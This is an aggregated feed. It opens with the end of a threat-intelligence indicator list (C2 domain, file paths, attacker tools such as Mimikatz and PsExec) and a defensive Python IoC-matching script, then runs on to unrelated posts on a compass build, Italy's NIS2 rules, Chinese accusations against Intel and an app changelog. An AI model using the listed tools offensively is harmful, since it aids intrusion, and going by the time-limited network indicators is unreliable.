C:\programdata\allinone2023\XenAllPasswordPro.exe
C:\Windows\Temp\nssm-2.24\win64\nssm.exe
C:\Users\[redacted]\Downloads\AnyDesk.exe
C:\Windows\Temp\localtonet.exe
C:\ProgramData\t.exe (MiniDump Tool)
C:\Users\User\AppData\Local\Temp\kxxxxxxx.sys
C:\Windows\Temp\kxxxxxxx.sys
/tmp/lock.out (Babuk)
/usr/sbin/xfs-healthcheck (resocks)
/usr/sbin/xfs-modules (resocks)
c:\programdata\intell\intellpui.vbs (CobInt)

IP addresses and URLs:
45.11.181[.]152 – netstaticpoints[.]com – CobInt C2
169.150.197[.]10 – SurfShark VPN
169.150.197[.]18 – SurfShark VPN
91.142.73[.]178 – VDSINA-NET
91.142.74[.]87 – VDSINA-NET
95.142.47[.]157 – VDSINA-NET
185.231.155[.]124 – VDSINA-NET

Utilities:
XenAllPasswordPro
PsExec
PAExec
SoftPerfect Network Scanner
Localtonet
PingCastle
Mimikatz
AnyDesk
NSSM
resocks
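The list above is defanged (91.142.73[.]178, hxxp://), so before it can be matched against telemetry it has to be normalised. As an added example, not Kaspersky's or the page's own tooling, here is a Python routine that refangs and parses a subset of the indicators copied from this section (two hashes, three addresses, one domain) and matches them against constructed endpoint and network records; hosts, paths, the benign hash and the DNS and connection records are assumptions for the demo.

```python
"""Refang the IoCs listed above and match them against constructed telemetry.

Added example, not code from Kaspersky or the page. IOC_TEXT copies a subset
of the indicators from the list above; SAMPLE_TELEMETRY is constructed, and
the benign file hash is an arbitrary constructed value.
"""
import re

IOC_TEXT = """
01fba22c3e6cf11805afe4ba2f7c303813c83486e07b2b418bf1b3fabfd2544e  dismcore.dll
3edb6fb033cc00c016520e2590e2888e393ad5ed725e853eea3bc86cee3b28b8  resocks
45.11.181[.]152 – netstaticpoints[.]com – CobInt C2
169.150.197[.]10 – SurfShark VPN
91.142.73[.]178 – VDSINA-NET
"""

SHA256_RE = re.compile(r"\b([0-9a-f]{64})\b(?:\s+(\S.*?))?\s*$", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def refang(text: str) -> str:
    """Undo common defanging: '[.]' -> '.' and 'hxxp' -> 'http'."""
    return re.sub(r"hxxp", "http", text.replace("[.]", "."), flags=re.I)


def parse_iocs(text: str):
    """Return {'sha256': {...}, 'ip': {...}, 'domain': {...}} mapping value -> label."""
    iocs = {"sha256": {}, "ip": {}, "domain": {}}
    for raw in text.strip().splitlines():
        line = refang(raw.strip())
        m = SHA256_RE.search(line)
        if m:
            iocs["sha256"][m.group(1).lower()] = (m.group(2) or "").strip()
            continue
        parts = [p.strip() for p in re.split(r"\s[–-]\s", line)]   # 'value – value – label'
        label = parts[-1] if len(parts) > 1 else ""
        for ip in IPV4_RE.findall(line):
            iocs["ip"][ip] = label
        for dom in DOMAIN_RE.findall(line):
            iocs["domain"][dom.lower()] = label
    return iocs


SAMPLE_TELEMETRY = [   # constructed records
    {"type": "file", "host": "ws-01", "path": r"C:\ProgramData\oracle\dismcore.dll",
     "sha256": "01FBA22C3E6CF11805AFE4BA2F7C303813C83486E07B2B418BF1B3FABFD2544E"},
    {"type": "file", "host": "ws-02", "path": r"C:\Windows\System32\notepad.exe",
     "sha256": "0" * 64},
    {"type": "dns", "host": "ws-01", "qname": "netstaticpoints.com"},
    {"type": "dns", "host": "ws-03", "qname": "example.org"},
    {"type": "conn", "host": "srv-01", "dst": "91.142.73.178", "dport": 443},
    {"type": "conn", "host": "srv-01", "dst": "192.0.2.10", "dport": 443},
]


def match_telemetry(records, iocs=None):
    """Return (host, kind, value, label) for every record that hits an IoC."""
    iocs = iocs or parse_iocs(IOC_TEXT)
    hits = []
    for r in records:
        if r["type"] == "file":
            h = r["sha256"].lower()
            if h in iocs["sha256"]:
                hits.append((r["host"], "sha256", h, iocs["sha256"][h]))
        elif r["type"] == "dns":
            q = r["qname"].lower().rstrip(".")
            if q in iocs["domain"]:
                hits.append((r["host"], "domain", q, iocs["domain"][q]))
        elif r["type"] == "conn" and r["dst"] in iocs["ip"]:
            hits.append((r["host"], "ip", r["dst"], iocs["ip"][r["dst"]]))
    return hits


if __name__ == "__main__":
    for host, kind, value, label in match_telemetry(SAMPLE_TELEMETRY):
        print(f"{host}: {kind} {value} ({label})")
```

Hash comparison is case-insensitive and DNS names are normalised, which are the two mistakes that most often make a correct IoC list silently miss. The VPN and hosting addresses carry their labels through, so an analyst sees "VDSINA-NET" next to a hit rather than a bare address; as the note above says, the network indicators are only valid at the time of publishing and should be re-checked before being turned into blocks.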


securelist.com/crypt-ghouls-ha…



Overcomplicating the Magnetic Compass for a Reason



Some inventions are so simple that it’s hard to improve them. The magnetic compass is a great example — a magnetized needle, a bit of cork, and a bowl of water are all you need to start navigating the globe. So why in the world would you want to over-complicate things with something like this Earth inductor compass? Just because it’s cool, of course.

Now, the thing with complication is that it’s often instructive. The simplicity of the magnetic compass masks the theory behind its operation to some degree and completely fails to deliver any quantitative data on the Earth’s magnetic field. [tsbrownie]’s gadget is built from a pair of electric motors, one intact and one stripped of its permanent magnet stators. The two are mounted on a 3D printed frame and coupled by a long shaft made of brass, to magnetically isolate them as much as possible. The motor is powered by a DC supply while a digital ammeter is attached to the terminals on the stator.

When the motor spins, the stator at the other end of the shaft cuts the Earth’s magnetic lines of force and generates a current, which is displayed on the ammeter. How much current is generated depends on how the assembly is oriented. In the video below, [tsbrownie] shows that the current nulls out when oriented along the east-west axis, and reaches a maximum along north-south. It’s not much current — about 35 microamps — but it’s enough to get a solid reading.

Is this a practical substitute for a magnetic compass? Perhaps not for most use cases, but a wind-powered version of this guided [Charles Lindbergh]’s Spirit of St. Louis across the Atlantic in 1927 with an error of only about 10 miles over the trip, so there’s that. Other aircraft compasses take different approaches to the problem of nulling out the magnetic field of the plane.

youtube.com/embed/5aGUOTizpqc?…


hackaday.com/2024/10/18/overco…



NIS2 in force from 16 October


youtube.com/embed/ikC4PPTIxJM?…
NIS2 institutional video – ACN
As of 16 October 2024, the new Italian legislation on Network and Information Security (NIS) has entered into force.
The National Cybersecurity Agency (Agenzia per la cybersicurezza nazionale) is the competent authority for applying NIS and the single point of contact, and it has laid out a gradual, sustainable path to let public and private organisations meet the new legal obligations.

The scope of the legislation widens. The sectors covered rise to 18, of which 11 are highly critical and 7 critical, involving over 80 types of entities, classified as essential or important according to the criticality of the activities they carry out and the sector in which they operate. This means stronger obligations on security measures and incident notification, and more supervisory power for the Agency and for the bodies responsible for incident response and crisis management.

New cybersecurity instruments are also envisaged, such as coordinated vulnerability disclosure, to be carried out through cooperation and information sharing at national and European level.

The implementation path

Adapting to the NIS legislation follows a sustainable path with gradual implementation of the obligations.

The first step for the entities concerned is to register on the ACN portal. The window runs from 1 December 2024 to 28 February 2025 for medium and large enterprises and, in some cases, also for small and micro enterprises. To ease the adoption of the incident notification obligations and the security measures, these will be defined progressively, following consultations within the sector working groups, by decisions of the ACN Director General to be adopted within the first four months of 2025.

A differentiated implementation window is also provided: 9 months for notifications and 18 months for security measures, running from the date on which the list of NIS entities is consolidated (end of March 2025). From April 2025 a shared path to strengthen national and European cybersecurity will therefore begin.


dicorinto.it/agenzia-per-la-cy…



Intel Accused by China of Planting Backdoors in Its Products and of a Weak Cyber Posture


On Wednesday 16 October, the Cyber Security Association of China (CSAC) published an article on its official WeChat account denouncing four main cyber risks associated with Intel products. Among these are frequent security problems, poor responsiveness to user reports, user monitoring under the pretext of remote management, and the presence of backdoors that threaten network security.

The CSAC drew attention to known vulnerabilities, such as those identified under the name “Downfall” in 2022 and 2023, which can be exploited by attackers to access sensitive information. It criticised Intel for continuing to sell products despite being aware of these problems and for its slow response to user complaints.

The association also accused Intel of having collaborated with Hewlett-Packard and other manufacturers in creating the IPMI (Intelligent Platform Management Interface) technical specification, used to monitor servers, which it says poses significant security risks because of its remote monitoring function.

The CSAC pointed out that a significant share of Intel’s annual revenue, which exceeds 50 billion dollars, comes from the Chinese market. It questioned Intel’s commitment to China, accusing the company of harming Chinese national interests, and called on the Chinese authorities to conduct a security review of Intel products to protect consumer rights.

The article also mentioned the US “CHIPS and Science Act”, claiming that Intel is its main beneficiary and that the measure aims to exclude the Chinese semiconductor industry, worsening tensions between the two powers.

Responding to the criticism, an Intel spokesperson stressed the importance of security for the company and its commitment to working with the relevant authorities. Against a backdrop of growing technological rivalry between the United States and China, analysts believe the CSAC’s position could foreshadow an official investigation into Intel by the Cyberspace Administration of China, similar to the one conducted last year into Micron Technology.

The article Intel Accused by China of Planting Backdoors in Its Products and of a Weak Cyber Posture originally appeared on il blog della sicurezza informatica.




@RaccoonForFriendica new version 0.1.0-beta10 available!

Changelog:
🦝 fix: avoid crash in HTML rendering;
🦝 fix: text color for direct message conversation title;
🦝 fix: avoid dismissing bottom sheets on long press;
🦝 fix: avoid videos from being stretched out of viewport;
🦝 fix: avoid attachment loss when editing an existing post;
🦝 feat: add support for Markdown and conditional markup;
🦝 enhancement: add warning if alt text is missing in attachments;
🦝 enhancement: improve profile opening in links;
🦝 fix: create post with images and delete images from posts on Mastodon;
🦝 fix: avoid bug which prevented draft creation;
🦝 chore: add more unit tests;
🦝 feat: add possibility to copy post content to clipboard.

#friendica #friendicadev #androidapp #androiddev #mobileapp #fediverseapp #kotlin #kmp #compose #multiplatform #opensource #livefasteattrash
